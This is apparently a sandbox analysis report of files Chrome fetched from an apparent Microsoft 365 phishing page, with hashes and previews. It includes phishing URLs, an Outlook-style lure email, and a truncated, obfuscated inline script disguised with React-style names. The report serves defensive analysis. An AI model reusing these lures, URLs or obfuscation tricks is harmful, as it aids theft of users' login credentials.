                                                                    Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                    Category:dropped
                                                                    Size (bytes):199
                                                                    Entropy (8bit):6.766983163126765
                                                                    Encrypted:false
                                                                    SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                    MD5:21B761F2B1FD37F587D7222023B09276
                                                                    SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                    SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                    SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                    Category:downloaded
                                                                    Size (bytes):2407
                                                                    Entropy (8bit):7.900400471609788
                                                                    Encrypted:false
                                                                    SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                    MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                    SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                    SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                    SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                                    Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (507), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):14700
                                                                    Entropy (8bit):4.934728604744949
                                                                    Encrypted:false
                                                                    SSDEEP:192:wVoR5vwbJ2M8ysuRIPXkcna2aAuhm+Wxf7jODEkSt8xoI2nCiNLYy+bpYy8rZpcz:woR5vwbk9McnP1uhmvxD03D
                                                                    MD5:8700C13C30D7D8D4972801241381A11F
                                                                    SHA1:2FF6D067319AD67C47670CD3BFE658F80425C0C0
                                                                    SHA-256:FE0A3A4CB13D17B2B8C1DD1C24AFE7D13176635F62B1C049629758ED54A965F6
                                                                    SHA-512:5A31702DC0F1CFD2A956D00CF67103803E727CF01D9E15D4A04D16394FAEBD163B2BCE9D397297DB10063EC1BB1C5B5C41BF9899684938E952784AE5275B3132
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/
                                                                    Preview:<div role="document"><div tabindex="0" aria-label="Message body" class="ulb23 GNqVo allowTextSelection OuGoX" id="UniqueMessageBody_10"><div><style type="text/css">.. ...rps_2143 #x_outlook a...{padding:0}...rps_2143 .x_ExternalClass...{width:100%}...rps_2143 .x_ExternalClass, .rps_2143 .x_ExternalClass p, .rps_2143 .x_ExternalClass span, .rps_2143 .x_ExternalClass font, .rps_2143 .x_ExternalClass td, .rps_2143 .x_ExternalClass div...{line-height:100%}...rps_2143 .x_es-button...{text-decoration:none!important}...rps_2143 a[x-apple-data-detectors]...{color:inherit!important;...text-decoration:none!important;...font-size:inherit!important;...font-family:inherit!important;...font-weight:inherit!important;...line-height:inherit!important}...rps_2143 .x_es-desk-hidden...{display:none;...float:left;...overflow:hidden;...width:0;...max-height:0;...line-height:0}..@media only screen and (max-width:600px) {...rps_2143 p, .rps_2143 ul li, .rps_2143 ol li, .rps_2143 a...{line-height:150%!impor
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 90 x 68
                                                                    Category:downloaded
                                                                    Size (bytes):1933
                                                                    Entropy (8bit):6.714574381049021
                                                                    Encrypted:false
                                                                    SSDEEP:48:0H3X3BNXrhfmR2xq+KhwuWl85pJMDCf6WcVqU08w3:0H3nBN7huR2g+KhCl0kqv8w3
                                                                    MD5:11D203DF4573DDEF7A39312650D60916
                                                                    SHA1:B34B20779C3D853DE36D9A42521CFF9075DE315B
                                                                    SHA-256:5992D4BCF7F1B705FA08AA8A3B0E4C5C1974C6E76B6BA5A69A7D21D0FD939247
                                                                    SHA-512:E3DC11AF9737A1B0A2DECE412C95D3C7AC56BC9951BC4A3F273E729ABD9411615B9FD7DF42E86DC2D4D91D0FC08AADB88C2448797D5AC56432B282B8C408E84B
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://secmail.bankofamerica.com/securereader/Image?c=lock&b=1&rnd=0.00823190732671009
                                                                    Preview:GIF89aZ.D.......SSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbccceeefffggghhhiiijjjkkkmmmnnnoooqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||~~~.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....Z.D........H......*\....#J.H....3j.... C..I...(S.\.......I...8s.l ..I.....J...H...p..P...12.....j.Z.....-..@...J+...........;4.A.C...:..].A.6 ..(.).Jm@p...D#.."@....U..L.@..N-..+..f.n...*zh.&.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                    Category:downloaded
                                                                    Size (bytes):673
                                                                    Entropy (8bit):7.6596900876595075
                                                                    Encrypted:false
                                                                    SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                    MD5:0E176276362B94279A4492511BFCBD98
                                                                    SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                    SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                    SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                    Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):1636
                                                                    Entropy (8bit):4.214613323368661
                                                                    Encrypted:false
                                                                    SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                    MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                    SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                    SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                    SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):68
                                                                    Entropy (8bit):4.835131731013994
                                                                    Encrypted:false
                                                                    SSDEEP:3:pg8BH3a8r9/1qiddO8k0kL62:p5BX5rPZddOW2
                                                                    MD5:1FF88D7E6CE0EFFEC359C41A6ED77C2F
                                                                    SHA1:0A7EF1924FB8FC49B70126C75A0E3476688A1E56
                                                                    SHA-256:842DD742BBF5C87477A45B6D5F9DC0DE51109F24BFEFAC949E6902ED367ABFF2
                                                                    SHA-512:D974F02AF3F19FD743E957F60794499F343FBDB0ACB6A71A55B13F8E0A237E00C859D3528655BE09294107850D6976B561BF0A32FB7B6DA7E44105E29C1E1E66
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQn0td6_2JN6vxIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                                                    Preview:CjAKCw2RYZVOGgQICRgBCgcNNYZUHBoACgsNkWGVThoECAkYAQoLDZFhlU4aBAgJGAE=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                    Category:downloaded
                                                                    Size (bytes):199
                                                                    Entropy (8bit):6.766983163126765
                                                                    Encrypted:false
                                                                    SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                    MD5:21B761F2B1FD37F587D7222023B09276
                                                                    SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                    SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                    SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                                    Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                    Category:downloaded
                                                                    Size (bytes):1435
                                                                    Entropy (8bit):7.8613342322590265
                                                                    Encrypted:false
                                                                    SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):2228
                                                                    Entropy (8bit):7.82817506159911
                                                                    Encrypted:false
                                                                    SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                    MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                    SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                    SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                    SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):1636
                                                                    Entropy (8bit):4.214613323368661
                                                                    Encrypted:false
                                                                    SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                    MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                    SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                    SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                    SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (49854)
                                                                    Category:downloaded
                                                                    Size (bytes):49993
                                                                    Entropy (8bit):5.216475744251136
                                                                    Encrypted:false
                                                                    SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                    MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                    SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                    SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                    SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                                    Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text
                                                                    Category:downloaded
                                                                    Size (bytes):23427
                                                                    Entropy (8bit):5.112735417225198
                                                                    Encrypted:false
                                                                    SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                    MD5:BA0537E9574725096AF97C27D7E54F76
                                                                    SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                    SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                    SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://www.w3schools.com/w3css/4/w3.css
                                                                    Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                    Category:downloaded
                                                                    Size (bytes):276
                                                                    Entropy (8bit):7.316609873335077
                                                                    Encrypted:false
                                                                    SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                    MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                    SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                    SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                    SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                    Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (4429)
                                                                    Category:downloaded
                                                                    Size (bytes):4713
                                                                    Entropy (8bit):4.905049370717305
                                                                    Encrypted:false
                                                                    SSDEEP:96:WQRlH5KY2b0s+uBxSaC2N9rx9G/YpJQ5K1tyYSs99YRJ:zRlH5KY2b0sjBxSaC2N9rx9GgpJQ5Kap
                                                                    MD5:49608E3A47EB7371D1611DE936C4C10B
                                                                    SHA1:43310949E499A8107DCEBD3C63F6D34443E750EA
                                                                    SHA-256:D1A50564605F103831C07FC6B34BF09F7C80C3E45F4BB5829AA296B1D7804AF1
                                                                    SHA-512:F06625FB5A29FDCB5139D318F82D1869F5FA8C0DC7697BD6332F7E94C4A67A4F0E2F3F638990A04CEB7B1C9B4977F370A996265D9FDFA3420204C7F5CE5659D8
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    URL:https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                                                    Preview:.<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. </head>. <body>. <noscript>You need to enable JavaScript to run this app.</noscript>. <div id="root">. <script>(function(){var reacthosteffectmask=[],react_nomodule={};try{function react_once(react_installedchunks){if('object'===typeof react_installedchunks&&null!==react_installedchunks){var react_allowtolivereload={};function react_newbasequeuelast(_node_modules_style_loader_dist_runtime_injectstylesintostyletag_js__webpack_imported_module_0___default){try{var reactreflect=react_installedchunks[_node_modules_style_loader_dist_runtime_injectstylesintostyletag_js__webpack_imported_module_0___default];switch(typeof reactreflect){case'object':if(null===reactreflect)break;case'function':reactreflect=reactreflect['toString']();}react_allowtolivereload[_node_modules_style_loader_dist_runtime_injectstylesintostyletag_js__webpack_imported_
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):366
                                                                    Entropy (8bit):5.576522029134512
                                                                    Encrypted:false
                                                                    SSDEEP:6:5mWxuJGzxZgjHnmYN6CiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwy:4WYcVZmHma6CDAWOvfWLSsPZ45dWDd43
                                                                    MD5:6E143987FA5402A34A23091F97C62382
                                                                    SHA1:D16ECDD848E51DAF188EC076A9A4ABB95FA12F1B
                                                                    SHA-256:FF9A454992A0BDBCD1517B62E6BA430A90635E2808AF8B0E7955B49C60EE40CD
